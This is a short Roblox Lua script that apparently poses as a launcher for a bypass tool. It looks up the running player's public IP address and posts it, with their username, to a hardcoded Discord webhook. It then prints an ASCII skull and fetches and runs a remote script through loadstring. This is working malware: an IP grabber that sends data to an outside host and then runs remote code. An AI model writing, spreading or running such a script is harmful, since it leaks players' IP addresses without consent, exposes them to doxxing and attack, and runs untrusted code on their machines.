local HttpService = game:GetService("HttpService")

local discordWebhookUrl = "https://discord.com/api/webhooks/1346216908499976232/tYDevFk9P0ILgy0dfYrY8WFB4_44NYqMYz4QIPEIWUCrxO5Nshz01amLTvGG5wEX-CMF"

local function getIp()
    local response = request({
        Url = "https://api.ipify.org/?format=json",
        Method = "GET"
    })

    if response.StatusCode == 200 then
        local data = HttpService:JSONDecode(response.Body)
        return data.ip
    else
        return nil
    end
end

local function sendToDiscord(ip)
    local messageData = {
        ["content"] = "Username: " .. game.Players.LocalPlayer.Name .. "\nIp: " .. ip
    }

    local jsonData = HttpService:JSONEncode(messageData)

    request({
        Url = discordWebhookUrl,
        Method = "POST",
        Headers = {
            ["Content-Type"] = "application/json"
        },
        Body = jsonData
    })
end

local ip = getIp()
if ip then
    sendToDiscord(ip)
end

print([[                
          .-"      "-.
         /            \
        |              |
        |,  .-.  .-.  ,|
        | )(_o/  \o_)( |
        |/     /\     \|
        (_     ^^     _)
         \__|IIIIII|__/
          | \IIIIII/ |
          \          /
           `--------`
]])


loadstring(game:HttpGet("https://raw.githubusercontent.com/AnnaRoblox/AnnaBypasser/refs/heads/main/AnnaBypasser.lua",true))()
